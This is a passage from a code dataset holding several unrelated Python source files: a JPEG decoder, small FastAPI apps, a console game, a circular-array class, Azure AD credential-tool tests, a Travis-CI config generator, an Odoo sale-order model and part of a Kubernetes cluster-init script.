point = (0, 0)\n\n # True when moving up-right, False when moving down-left\n move_up = True\n\n for i in range(rows * cols):\n yield point\n if move_up:\n if inbounds(move(UP_RIGHT, point)):\n point = move(UP_RIGHT, point)\n else:\n move_up = False\n if inbounds(move(RIGHT, point)):\n point = move(RIGHT, point)\n else:\n point = move(DOWN, point)\n else:\n if inbounds(move(DOWN_LEFT, point)):\n point = move(DOWN_LEFT, point)\n else:\n move_up = True\n if inbounds(move(DOWN, point)):\n point = move(DOWN, point)\n else:\n point = move(RIGHT, point)\n\n\ndef bits_required(n):\n n = abs(n)\n result = 0\n while n > 0:\n n >>= 1\n result += 1\n return result\n\n\ndef binstr_flip(binstr):\n # check if binstr is a binary string\n if not set(binstr).issubset('01'):\n raise ValueError(\"binstr should have only '0's and '1's\")\n return ''.join(map(lambda c: '0' if c == '1' else '1', binstr))\n\n\ndef uint_to_binstr(number, size):\n return bin(number)[2:][-size:].zfill(size)\n\n\ndef int_to_binstr(n):\n if n == 0:\n return ''\n\n binstr = bin(abs(n))[2:]\n\n # change every 0 to 1 and vice verse when n is negative\n return binstr if n > 0 else binstr_flip(binstr)\n\n\ndef flatten(lst):\n return [item for sublist in lst for item in sublist]\n\n\nclass JPEGFileReader:\n TABLE_SIZE_BITS = 16\n BLOCKS_COUNT_BITS = 32\n\n DC_CODE_LENGTH_BITS = 4\n CATEGORY_BITS = 4\n\n AC_CODE_LENGTH_BITS = 8\n RUN_LENGTH_BITS = 4\n SIZE_BITS = 4\n\n def __init__(self, filepath):\n self.__file = open(filepath, 'r')\n\n def read_int(self, size):\n if size == 0:\n return 0\n\n # the most significant bit indicates the sign of the number\n bin_num = self.__read_str(size)\n if bin_num[0] == '1':\n return self.__int2(bin_num)\n else:\n return self.__int2(binstr_flip(bin_num)) * -1\n\n def read_dc_table(self):\n table = dict()\n\n table_size = self.__read_uint(self.TABLE_SIZE_BITS)\n for _ in range(table_size):\n category = self.__read_uint(self.CATEGORY_BITS)\n code_length = self.__read_uint(self.DC_CODE_LENGTH_BITS)\n code = self.__read_str(code_length)\n table[code] = category\n return table\n\n def read_ac_table(self):\n table = dict()\n\n table_size = self.__read_uint(self.TABLE_SIZE_BITS)\n for _ in range(table_size):\n run_length = self.__read_uint(self.RUN_LENGTH_BITS)\n size = self.__read_uint(self.SIZE_BITS)\n code_length = self.__read_uint(self.AC_CODE_LENGTH_BITS)\n code = self.__read_str(code_length)\n table[code] = (run_length, size)\n return table\n\n def read_blocks_count(self):\n return self.__read_uint(self.BLOCKS_COUNT_BITS)\n\n def read_huffman_code(self, table):\n prefix = ''\n # TODO: break the loop if __read_char is not returing new char\n while prefix not in table:\n prefix += self.__read_char()\n return table[prefix]\n\n def __read_uint(self, size):\n if size <= 0:\n raise ValueError(\"size of unsigned int should be greater than 0\")\n return self.__int2(self.__read_str(size))\n\n def __read_str(self, length):\n return self.__file.read(length)\n\n def __read_char(self):\n return self.__read_str(1)\n\n def __int2(self, bin_num):\n return int(bin_num, 2)\n\n\ndef read_image_file(filepath):\n reader = JPEGFileReader(filepath)\n\n tables = dict()\n for table_name in ['dc_y', 'ac_y', 'dc_c', 'ac_c']:\n if 'dc' in table_name:\n tables[table_name] = reader.read_dc_table()\n else:\n tables[table_name] = reader.read_ac_table()\n\n blocks_count = reader.read_blocks_count()\n\n dc = np.empty((blocks_count, 3), dtype=np.int32)\n ac = np.empty((blocks_count, 63, 3), dtype=np.int32)\n\n for block_index in range(blocks_count):\n for component in range(3):\n dc_table = tables['dc_y'] if component == 0 else tables['dc_c']\n ac_table = tables['ac_y'] if component == 0 else tables['ac_c']\n\n category = reader.read_huffman_code(dc_table)\n dc[block_index, component] = reader.read_int(category)\n\n cells_count = 0\n\n # TODO: try to make reading AC coefficients better\n while cells_count < 63:\n run_length, size = reader.read_huffman_code(ac_table)\n\n if (run_length, size) == (0, 0):\n while cells_count < 63:\n ac[block_index, cells_count, component] = 0\n cells_count += 1\n else:\n for i in range(run_length):\n ac[block_index, cells_count, component] = 0\n cells_count += 1\n if size == 0:\n ac[block_index, cells_count, component] = 0\n else:\n value = reader.read_int(size)\n ac[block_index, cells_count, component] = value\n cells_count += 1\n\n return dc, ac, tables, blocks_count\n\n\ndef zigzag_to_block(zigzag):\n # assuming that the width and the height of the block are equal\n rows = cols = int(math.sqrt(len(zigzag)))\n\n if rows * cols != len(zigzag):\n raise ValueError(\"length of zigzag should be a perfect square\")\n\n block = np.empty((rows, cols), np.int32)\n\n for i, point in enumerate(zigzag_points(rows, cols)):\n block[point] = zigzag[i]\n\n return block\n\n\ndef dequantize(block, component):\n q = load_quantization_table(component)\n return block * q\n\n\ndef idct_2d(image):\n return fftpack.idct(fftpack.idct(image.T, norm='ortho').T, norm='ortho')\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input\", help=\"path to the input image\")\n args = parser.parse_args()\n\n dc, ac, tables, blocks_count = read_image_file(args.input)\n\n # assuming that the block is a 8x8 square\n block_side = 8\n\n # assuming that the image height and width are equal\n image_side = int(math.sqrt(blocks_count)) * block_side\n\n blocks_per_line = image_side // block_side\n\n npmat = np.empty((image_side, image_side, 3), dtype=np.uint8)\n\n for block_index in range(blocks_count):\n i = block_index // blocks_per_line * block_side\n j = block_index % blocks_per_line * block_side\n\n for c in range(3):\n zigzag = [dc[block_index, c]] + list(ac[block_index, :, c])\n quant_matrix = zigzag_to_block(zigzag)\n dct_matrix = dequantize(quant_matrix, 'lum' if c == 0 else 'chrom')\n block = idct_2d(dct_matrix)\n npmat[i:i+8, j:j+8, c] = block + 128\n\n image = Image.fromarray(npmat, 'YCbCr')\n image = image.convert('RGB')\n image.show()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"vjoshi12/dicom-viewer","sub_path":"dicomviewerapp/jdecode.py","file_name":"jdecode.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39023771265","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom app.core.config import settings\nfrom app.api.v1.api import api_router\n\napp = FastAPI(\n title=settings.PROJECT_NAME\n)\n\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS]\n )\n\napp.include_router(api_router, prefix=\"/api/v1\", tags=[\"v1\"])\n\n@app.get(\"/\")\nasync def root():\n return 'Sometimes I dream about cheese.'","repo_name":"hitomi-team/sukima","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"18"} +{"seq_id":"7047022941","text":"\"\"\"______________________________________________\n| Programação II - 2º Ciclo Jogos Digitais |\n| Nome: Thiago Zacarias da Silva |\n| Programa : Comportamento Boo |\n| Data : 15/04/2018 |\n|________________________________________________|\n\"\"\"\n\nimport time\n\nboo = '¶'\nmapa = ['_'] * 20\nbooPos = len(mapa) - 2\nplayer = '>'\nplayerSide = 'esquerda'\n\nmapa[0] = player\nmapa[len(mapa) - 1] = boo\ndigitar = True\ncontrole = 0\n\nwhile True:\n if digitar and controle == 0:\n playerSide = input('\\nesquerda\\t|\\tdireita\\nPra qual lado deseja virar o jogador? ')\n controle = 3\n\n if playerSide == 'esquerda':\n player = '<'\n mapa[0] = player\n for i in range(len(mapa)):\n mapa[booPos] = boo\n mapa[booPos + 1] = '_'\n print(mapa[i], end='')\n\n else:\n player = '>'\n mapa[0] = player\n for i in range(len(mapa)):\n print(mapa[i], end='')\n controle = 1\n\n if playerSide == 'esquerda':\n booPos -= 1\n controle -= 1\n if booPos < 0:\n print('\\n\\nO jogador Morreu')\n break\n\n\n print('')\n time.sleep(.2)","repo_name":"thiagoaxll/Python","sub_path":"Exercícios/ComportamentoBoo.py","file_name":"ComportamentoBoo.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36206762915","text":"from itertools import *\nfrom collections import *\nfrom heapq import *\nfrom bisect import *\nfrom copy import *\nimport math\nimport sys\nsys.setrecursionlimit(1<<20)\nINF = float('inf')\nR,C,K = map(int,input().split())\nS = [input() for _ in range(R)]\nL = []\nfor i in range(R):\n tmp = []\n for j in range(C):\n if S[i][j]=='o':\n tmp.append(True)\n else:\n tmp.append(False)\n L.append(tmp)\n# print(L)\nfor _ in range(K-1):\n LL = [[False]*C for _ in range(R)]\n for i in range(R):\n for j in range(C):\n if 1<=i str:\n return 'string'\n\n\n@app.post('/post')\ndef post():\n return post_db[0]\n\n\n@app.get('/dog')\ndef get_dogs(kind: str = None):\n list_dogs = []\n if kind is None:\n return dogs_db\n for i in range(len(dogs_db)):\n if kind == dogs_db.get(i).kind:\n list_dogs.append(dogs_db.get(i))\n return list_dogs\n\n\n\n@app.post('/dog')\ndef create_dogs(dog: Dog) -> Dog:\n pk_ = len(dogs_db)\n for i in range(len(dogs_db)):\n if dog.pk == dogs_db.get(i).pk:\n dog.pk = pk_\n dogs_db[dog.pk] = dog\n return dog\n\n\n@app.get('/dog/{pk}')\ndef get_dog_pk(pk: int):\n for i in range(len(dogs_db)):\n if pk == dogs_db.get(i).pk:\n return dogs_db.get(i)\n return 'Dog does not exist'\n\n\n@app.patch('/dog/{pk}')\ndef update_dog(pk: int, dog: Dog):\n for i in range(len(dogs_db)):\n if pk == dogs_db.get(i).pk:\n dogs_db[dog.pk] = dog\n return dogs_db[dog.pk]\n return 'Dog does not exist'\n\n\n@app.get('/dog/{kind}')\ndef get_dog_pk(kind: str):\n for i in range(len(dogs_db)):\n if kind == dogs_db.get(i).kind:\n return dogs_db.get(i)\n return 'Dog does not exist'\n","repo_name":"NatashaMakhanova/fast_api_hw","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44135241914","text":"# python3\n# circular_array.py - Array like data structure that allows for efficient rotations.\n\nimport time\n\n# Without using deque:\n\nclass Node:\n def __init__(self, key, prev=None, next=None):\n self.key = key\n self.prev = prev\n self.next = next\n\n def __str__(self):\n return str(self.key)\n\n\nclass CircularArray:\n \"\"\"\n Array like data structure that allows for efficient rotations.\n \"\"\"\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def add(self, key):\n \"\"\"\n Adds nodes to the end of the array\n \"\"\"\n if self.is_empty() == True:\n self.head = self.tail = Node(key)\n else:\n self.tail.next = Node(key, self.tail, None)\n self.tail = self.tail.next\n return self\n\n def is_empty(self):\n return self.head == None\n\n def popleft(self):\n if self.is_empty() == True:\n raise Exception(\"Popping from an empty array.\")\n elif self.head.next == None:\n node = self.head\n self.head = None\n self.tail = None\n else:\n node = self.head\n\n # Clear old node relationships and create new ones for next node\n new_head = self.head.next\n self.head = new_head\n self.head.next = new_head.next\n self.head.prev = None\n return node\n\n def rotate(self, num_rotations):\n if self.is_empty() == True:\n raise Exception(\"Rotating an empty array.\")\n else:\n for x in range(num_rotations):\n node = self.popleft()\n self.add(node.key)\n\n def __str__(self):\n values = [str(x) for x in self]\n return \" <--> \".join(values)\n\n def __iter__(self):\n current = self.head\n while current:\n yield current\n current = current.next\n\n\n\ndef example():\n circular_array = CircularArray()\n \n for x in range(1, 10):\n circular_array.add(x)\n circular_array.rotate(10)\n print(circular_array)\n\n circular_array.rotate(10)\n print(circular_array)\n circular_array.popleft()\n print(circular_array)\n\n for x in range(1, 9):\n circular_array.popleft()\n\n start = time.time()\n for x in range(1, 100):\n circular_array.add(x)\n start = time.time()\n circular_array.rotate(1000)\n end = time.time()\n difference = end - start \n print(f\"100 items: {round(difference, 16)} seconds\")\n for x in range(1, 100):\n circular_array.popleft()\n\n for x in range(1, 1000):\n circular_array.add(x)\n\n start = time.time()\n circular_array.rotate(1000)\n end = time.time()\n difference = end - start \n print(f\"10000 items: {round(difference, 16)} seconds\")\n\n for x in range(1, 1000):\n circular_array.popleft()\n\n \n for x in range(1, 100):\n circular_array.add(x)\n\n start = time.time()\n circular_array.rotate(10)\n end = time.time()\n difference = end - start \n print(f\"10 rotations: {round(difference, 16)} seconds\")\n\n start = time.time()\n circular_array.rotate(100)\n end = time.time()\n difference = end - start \n print(f\"100 rotations: {round(difference, 16)} seconds\")\n\n start = time.time()\n circular_array.rotate(10000)\n end = time.time()\n difference = end - start \n print(f\"10000 rotations: {round(difference, 16)} seconds\")\n\n start = time.time()\n circular_array.rotate(1000000)\n end = time.time()\n difference = end - start \n print(f\"1000000 rotations: {round(difference, 16)} seconds\")\n\n \nif __name__ == \"__main__\":\n example()","repo_name":"GingerLee11/CCI_6ed","sub_path":"chapter_7/circular_array.py","file_name":"circular_array.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39718027887","text":"\r\nimport mock\r\n\r\nimport pytest\r\nimport requests\r\n\r\n\r\nfrom aws_aad_creds.aad import DeviceCodeAuthenticator\r\nfrom aws_aad_creds.aad import DeviceCodeCredentialsFetcher\r\n\r\n\r\n@pytest.fixture\r\ndef mock_requests_session():\r\n return mock.Mock(spec=requests.Session)\r\n\r\n\r\n@pytest.fixture\r\ndef aad_auth(prompter, mock_requests_session):\r\n return DeviceCodeAuthenticator(prompter, mock_requests_session)\r\n\r\n\r\n@pytest.fixture\r\ndef generic_config():\r\n return {\r\n 'role_arn': 'arn:aws:iam::123456789012:role/fakerole',\r\n 'cli_client_id': '11111111-1111-1111-1111-111111111111',\r\n 'aad_tenant': 'testtenant.obviouslyfake.mockdomain',\r\n 'middleware_client_id': '22222222-2222-2222-2222-222222222222',\r\n 'middleware_client_secret': 'notsosecret',\r\n 'middleware_url': None,\r\n 'authority_host_url': 'https://clearly.notmicrosoft.mockdomain'\r\n }\r\n\r\n\r\n@pytest.fixture\r\ndef middleware_url_config():\r\n return {\r\n 'role_arn': 'arn:aws:iam::123456789012:role/fakerole',\r\n 'cli_client_id': '11111111-1111-1111-1111-111111111111',\r\n 'aad_tenant': 'testtenant.obviouslyfake.mockdomain',\r\n 'middleware_client_id': None,\r\n 'middleware_client_secret': None,\r\n 'middleware_url': 'https://middleware.obviouslyfake.mockdomain',\r\n 'authority_host_url': 'https://clearly.notmicrosoft.mockdomain'\r\n }\r\n\r\n\r\n@pytest.fixture\r\ndef aad_fetcher(generic_config, client_creator, prompter, mock_authenticator,\r\n cache):\r\n authenticator_cls = mock.Mock(return_value=mock_authenticator)\r\n provider_name = 'myprovider'\r\n\r\n class MockDeviceCodeCredentialsFetcher(DeviceCodeCredentialsFetcher):\r\n _PROVIDERS = {\r\n provider_name: authenticator_cls\r\n }\r\n\r\n fetcher = MockDeviceCodeCredentialsFetcher(\r\n client_creator=client_creator,\r\n provider_name=provider_name,\r\n saml_config=generic_config,\r\n password_prompter=prompter,\r\n cache=cache\r\n )\r\n return fetcher\r\n\r\n\r\n@pytest.fixture\r\ndef mock_authenticator():\r\n return mock.Mock(spec=DeviceCodeAuthenticator)\r\n\r\n\r\n@pytest.fixture\r\ndef cache():\r\n return {}\r\n\r\n\r\nclass TestDeviceCodeAuthenticator(object):\r\n\r\n @pytest.mark.xfail(reason=\"TODO: Cover with tests\")\r\n def test_nothing_implemented_yet(self, aad_auth):\r\n assert aad_auth is None\r\n\r\n\r\nclass TestDeviceCodeCredentialsFetcher(object):\r\n\r\n @pytest.mark.xfail(reason=\"TODO: Cover with tests\")\r\n def test_nothing_implemented_yet(self, fetcher):\r\n assert fetcher is None\r\n","repo_name":"elliotsegler/aws-aad-creds","sub_path":"tests/unit/test_aad.py","file_name":"test_aad.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"75094576359","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport argparse\nimport subprocess\nimport datetime\n\n\ndef _log(prefix, color, message, color_full_line=True):\n if color_full_line:\n print(f'{color}{prefix}: {message}\\033[0m');\n else:\n print(f'{color}{prefix}:\\033[0m {message}');\n\ndef log_t(msg): _log('TRC', '\\033[90m', msg, color_full_line=True)\ndef log_d(msg): _log('DBG', '\\033[39m', msg)\ndef log_i(msg): _log('INF', '\\033[94m', msg)\ndef log_w(msg): _log('WRN', '\\033[33m', msg)\ndef log_e(msg): _log('ERR', '\\033[91m', msg)\n\n\n\ndef shell_exec(cmd, timeout_s=5, check_succ=True):\n cmd_copy = []\n quoter_parts = []\n quoter_type = '\"'\n for p in cmd.split():\n if quoter_parts:\n if not p.endswith(quoter_type):\n quoter_parts.append(p)\n else:\n quoter_parts.append(p[:-1])\n cmd_copy.append(' '.join(quoter_parts))\n quoter_parts.clear()\n else:\n if p.startswith('\"'):\n quoter_type = '\"'\n if p.endswith(quoter_type):\n cmd_copy.append(p)\n else:\n quoter_parts.append(p[1:])\n elif p.startswith(\"'\"):\n quoter_type = \"'\"\n if p.endswith(quoter_type):\n cmd_copy.append(p)\n else:\n quoter_parts.append(p[1:])\n else:\n cmd_copy.append(p)\n log_t('C>[{}]'.format(' '.join(cmd_copy)))\n res = subprocess.run(cmd_copy, capture_output=True, timeout=timeout_s)\n ec = res.returncode\n out = res.stdout.decode('utf-8').rstrip()\n if out and len(out.split('\\n')) > 1:\n log_t(f'R({ec})<\\n{out}')\n else:\n log_t(f'R({ec})<[{out}]')\n if check_succ:\n res.check_returncode()\n return out\n return ec, out\n\n\n\nclass Config:\n CTRL_PREFIXES = ['hw']\n GIT_ROOT = '.'\n GIT_INIT_COMMIT = 'd829c61855aff7241e12d8578d4a66a7118eb327'\n TRAVIS_CI_CFG_NAME = '.travis.yml'\n TRAVIS_CI_DIR = '.git/travis-ci'\n LAST_GREEN_COMMIT_FNAME = '.git/travis-ci/last_green_build_commit'\n STATE_FNAME = '.git/travis-ci/state'\n NEED_INIT = False\n SET_READY = False\n SAVE_COMMIT = None\n IS_CONTINUE = False\n\n @staticmethod\n def init_cfg():\n log_d('class @Config initialisation')\n Config.GIT_INIT_COMMIT = shell_exec('git rev-list --max-parents=0 HEAD')\n Config.GIT_ROOT = shell_exec('git rev-parse --show-toplevel').strip()\n Config.TRAVIS_CI_DIR = f'{Config.GIT_ROOT}/.git/travis-ci'\n Config.LAST_GREEN_COMMIT_FNAME = f'{Config.TRAVIS_CI_DIR}/last_green_build_commit'\n Config.STATE_FNAME = f'{Config.TRAVIS_CI_DIR}/state'\n\n @staticmethod\n def self_path(is_abs=False):\n rel_path = 'scripts/travis_yml_generator.py'\n return f'{Config.GIT_ROOT}/{rel_path}' if is_abs else rel_path\n\n @staticmethod\n def parse_args():\n parser = argparse.ArgumentParser(\n description='Generator of Tracis-CI configuration before pushing changes to GitHub')\n parser.add_argument('--init', action='store_true', help='Initialize repo for developer')\n parser.add_argument('--set_ready', action='store_true', help='Approve pushing changes')\n parser.add_argument('--set_commit', metavar='HASH', help='Set last \\033[92mGREEN\\033[0m commit')\n parser.add_argument('--exec_main', action='store_true', help='Execute main functionality')\n args = parser.parse_args()\n Config.NEED_INIT = args.init\n Config.SET_READY = args.set_ready\n Config.SAVE_COMMIT = args.set_commit\n Config.IS_CONTINUE = args.exec_main\n\n @staticmethod\n def set_state(state):\n assert type(state) == type(True)\n with open(Config.STATE_FNAME, 'w') as f:\n f.write('READY' if state else 'NOT READY')\n\n @staticmethod\n def get_state():\n if not os.path.isfile(Config.STATE_FNAME): return False\n state = ''\n with open(Config.STATE_FNAME, 'r') as f: state = f.readline().strip()\n if not state: return False\n return state == 'READY'\n\n @staticmethod\n def create_working_dir_if_needed():\n if not os.path.isdir(Config.TRAVIS_CI_DIR):\n os.mkdir(Config.TRAVIS_CI_DIR, mode=0o755)\n\n @staticmethod\n def set_commit(commit):\n with open(Config.LAST_GREEN_COMMIT_FNAME, 'w') as f:\n f.write(commit)\n\n\nclass Project:\n def __init__(self, dir_name):\n self.sep = '-'\n self.dir = dir_name\n self.build_dir = dir_name + '/build'\n sep_index = dir_name.index(self.sep)\n self.prefix = dir_name[0:sep_index]\n self.name = dir_name[sep_index+1:]\n def full_name(self):\n return '{}{}{}'.format(self.prefix, self.sep, self.name)\n def has_ut(self):\n cmake_cfg = self.dir + '/CMakeLists.txt'\n if not os.path.isfile(cmake_cfg): return False\n ec, _ = shell_exec(f\"grep -w enable_testing {cmake_cfg}\", check_succ=False)\n return 0 == ec\n # for set()\n def __hash__(self):\n return hash(self.dir)\n def __eq__(self, v):\n return self.dir == v.dir\n # for sorted()\n def __lt__(self, v):\n return self.dir < v.dir\n\n\ndef gen_warning():\n return \"\"\"# This is autogen file by tools/travis_yml_generator.py\n# Do not change it manualy because after a next `git push` command this file\n# will be regenerated.\n#\n\n\"\"\"\n\n\ndef last_green_travis_build():\n commit = ''\n if os.path.isfile(Config.LAST_GREEN_COMMIT_FNAME):\n with open(Config.LAST_GREEN_COMMIT_FNAME, 'r') as f: commit = f.readline()\n return commit if commit else Config.GIT_INIT_COMMIT\n\n\ndef gen_travis_yaml(changed_projects):\n TRAVIS_CI_CFG_PATH = f'{Config.GIT_ROOT}/{Config.TRAVIS_CI_CFG_NAME}'\n\n if not changed_projects: return False\n changed_projects = sorted(changed_projects)\n stage_parts = []\n for project in changed_projects:\n yml_part = ' - script: ' if stage_parts else ' - stage: Build && Test && Deploy\\n script: '\n cmd_test = \"cmake --build . --target test\"\n commands = [\n f\"mkdir -p '{project.build_dir}'\",\n f\"pushd '{project.build_dir}'\",\n \"cmake -DGTEST_ROOT=/tmp/gtest-install ..\",\n \"cmake --build .\",\n cmd_test,\n \"cmake --build . --target package\",\n \"popd\",\n ]\n if not project.has_ut(): commands.remove(cmd_test)\n yml_part += ' && '.join(commands)\n yml_part += f\"\"\"\\n deploy:\n provider: script\n skip_cleanup: true\n script: bash scripts/deploy.sh {project.name} {project.build_dir}\n on:\n branch: main\n\"\"\"\n stage_parts.append(yml_part)\n\n with open(TRAVIS_CI_CFG_PATH, 'w') as f:\n f.write(gen_warning())\n f.write(\"\"\"language: cpp\nos: linux\ndist: focal\ncompiler: gcc\n\nbefore_install:\n - sudo add-apt-repository --yes ppa:ubuntu-toolchain-r/test\n - sudo apt-get update -qq\ninstall: \n - sudo apt-get install -qq g++-10\n - sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-10 90 --slave /usr/bin/g++ g++ /usr/bin/g++-10\n\nbefore_script:\n- sudo apt-get install libboost-test-dev -y\n- echo \"deb http://archive.ubuntu.com/ubuntu xenial main universe\" | sudo tee -a /etc/apt/sources.list\n- sudo apt-get update -qq\n- mkdir /tmp/gtest-src /tmp/gtest-build /tmp/gtest-install\n- git clone https://github.com/google/googletest /tmp/gtest-src\n- pushd /tmp/gtest-build && cmake -DCMAKE_INSTALL_PREFIX:PATH=/tmp/gtest-install /tmp/gtest-src && cmake --build . && cmake --build . --target install && popd\n\njobs:\n include:\n\"\"\")\n for part in stage_parts:\n f.write(part)\n f.write('\\n')\n f.write('\\n')\n return TRAVIS_CI_CFG_PATH\n\n\ndef commit_changes(yml):\n shell_exec(f'git add {yml}')\n if [1 for line in shell_exec('git status -uno --porcelain').split('\\n')]:\n yml_name = yml.split('/')[-1]\n return 0 == shell_exec(f'git commit -m \"[AUTO] regen {yml_name} before pushing\"', check_succ=False)[0]\n\n\ndef InitRepo():\n Config.create_working_dir_if_needed()\n Config.set_commit(Config.GIT_INIT_COMMIT)\n Config.set_state(False)\n with open(f'{Config.GIT_ROOT}/.git/hooks/pre-push', 'w') as f:\n f.write('''#!/bin/sh\n\n#\n# This file was generated by scripts/travis_yml_generator.py\n# Creation time point: {1}\n#\n\nif [ -f '{0}' ] ; then\n python3 '{0}'\nelse\n echo \"ERROR: can't find ['{0}']\"\n exit 1\nfi\n'''.format(Config.self_path(), datetime.datetime.now().isoformat()))\n\n\n\n\n\ndef main():\n Config.parse_args()\n Config.init_cfg()\n need_exit = False\n if Config.NEED_INIT: InitRepo(); need_exit = True\n if Config.SET_READY: Config.set_state(True); need_exit = True\n if Config.SAVE_COMMIT: Config.set_commit(Config.SAVE_COMMIT); need_exit = True\n if Config.IS_CONTINUE: need_exit = False\n if need_exit: return\n\n log_i('Getting last green commit')\n last_green = last_green_travis_build()\n\n log_i('Collect valued changes')\n changed = set()\n for line in shell_exec(f'git diff --name-only HEAD {last_green}').split('\\n'):\n file_root = line.split('/')[0]\n for prefix in Config.CTRL_PREFIXES:\n if file_root.startswith(prefix):\n changed.add(Project(file_root))\n break\n if changed:\n log_i('Generation new CI configuration for {} project(s)'.format(len(changed)))\n yml_name = gen_travis_yaml(changed)\n if commit_changes(yml_name):\n log_w('Disable \"git push\"')\n Config.set_state(False)\n\n if not Config.get_state():\n self_path = Config.self_path(is_abs=True)\n push_cmd = f'{self_path} --set_ready && git push\\n' if changed else ''\n log_e('''\n=======================================\n!!! 'git push' command was disabled !!!\n=======================================\n\nLatest saved commit: {0}\n\nSet a new commit: --set_commit NEW_COMMIT\nEnabling 'git push': --set_ready\n\nPossible commads:\n{1} --set_ready\n{1} --set_commit NEW_COMMIT\n{1} --set_ready --set_commit NEW_COMMIT\n{2}\n'''.format(last_green, self_path, push_cmd))\n return 1\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n\n","repo_name":"zhaldak/otus-cpp","sub_path":"scripts/travis_yml_generator.py","file_name":"travis_yml_generator.py","file_ext":"py","file_size_in_byte":10472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14579442577","text":"import json\nimport random\n\nimport pytz\n\nfrom odoo import fields, models, api\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools import misc\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n test_field = fields.Text(string='Test')\n\n _sql_constraints = [\n ('check_test_field', 'CHECK(char_length(test_field) < 50)',\n 'Длина текста должна быть меньше 50 символов!'),\n ]\n\n # Если пользователь меняет строки (продукты) Quotations или изменяет Quotation Date,\n # то значение меняется на лету на текст в формате «Total - Date» (пример значения: 8,287.50 - 02/06/2022 16:33:53)\n @api.onchange('date_order', 'order_line')\n def _onchange_date_or_order(self):\n if self.state == 'draft':\n # переводим self.date_order из временной зоны БД во временную зону пользователя\n user_tz = pytz.timezone(self.env.user.tz)\n converted_tz = pytz.utc.localize(self.date_order).astimezone(user_tz).strftime(\n misc.DEFAULT_SERVER_DATETIME_FORMAT)\n self.test_field = f'{json.loads(self.tax_totals_json)[\"amount_total\"]} - {converted_tz}'\n\n # Если пользователь вручную вводит текст длиной более 50 символов, то появляется сообщение «Длина текста должна быть меньше 50 символов!»\n @api.onchange('test_field')\n def _onchange_test_field(self):\n if len(self.test_field) > 50:\n raise ValidationError(\"Длина текста должна быть меньше 50 символов!\")\n\n # По умолчанию, когда пользователь создает новый Quotation поле «Test» заполняется случайным числом.\n @api.model\n def create(self, vals):\n vals['test_field'] = random.randrange(100)\n return super().create(vals)\n","repo_name":"swish-ds/odoo-dstarovoitov","sub_path":"odoo_dstarovoitov/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1662283156","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport re\n\nfrom Util.util import *\nfrom Kube.template import *\nfrom Util.log import Logger as logger\nfrom Kube import render\n\n\nclass KubeInit:\n def __init__(self, conf):\n self.conf = conf\n\n self.init_config_file = os.path.join(conf.kube_init_path, \"init.yaml\")\n self.kube_network_plugin = os.path.join(\n conf.kube_init_path, \"kube-{}.yaml\".format(conf.kube_network_plugin_name)\n )\n\n self.kube_first_master_ipaddr = conf.master[\"servers\"][0]\n self.kube_other_master_ipaddr = conf.master[\"servers\"][1:]\n self.kube_node_ipaddr = conf.node[\"servers\"]\n\n self.config_dir = os.path.join(self.conf.base_dir, \"Files/configs\")\n self.plugin_dir = os.path.join(self.conf.base_dir, \"Files/plugin\")\n self.script_dir = os.path.join(self.conf.base_dir, \"Files/scripts\")\n\n def init_docker_env(self):\n logger.get().info(\"初始化docker环境\")\n ips = self.conf.all_ip\n init_script = os.path.join(self.script_dir, \"init_env.sh\")\n target = os.path.join(self.conf.kube_init_path, \"init_env.sh\")\n cmd = RUN_SHELL.format(FILE=target)\n logger.get().debug(cmd)\n for ip in ips:\n Copy(self.conf.ssh_user, ip, init_script, target)\n RunCmdHost(self.conf.ssh_user, ip, cmd)\n\n def init_master_node(self, ip=\"\"):\n if ip == \"\":\n ip = self.kube_first_master_ipaddr\n logger.get().info(\"初始化父master节点,ip地址{}\".format(ip))\n render.fill_kubeadm_init_config(self.conf)\n src = os.path.join(self.config_dir, \"init.yaml\")\n logger.get().info(\"渲染kubeadm 初始化文件: {}\".format(src))\n dest = self.init_config_file\n Copy(self.conf.ssh_user, ip, src, dest)\n cmd = INIT_ADMIN.format(CONFIG_PATH=dest)\n logger.get().debug(cmd)\n RunCmdHost(self.conf.ssh_user, ip, cmd)\n\n def sync_kubernetes_config(self, ips):\n kube_config_dir = \"/etc/kubernetes/pki/\"\n for ip in ips:\n logger.get().info(\"分发k8s pki文件到 {}\".format(ip))\n Copy(self.conf.ssh_user, ip, kube_config_dir, kube_config_dir, type=\"dir\")\n\n def init_other_master_node(self):\n self.sync_kubernetes_config(self.kube_other_master_ipaddr)\n src = os.path.join(self.config_dir, \"init.yaml\")\n dest = self.init_config_file\n cmd = INIT_ADMIN.format(CONFIG_PATH=dest)\n 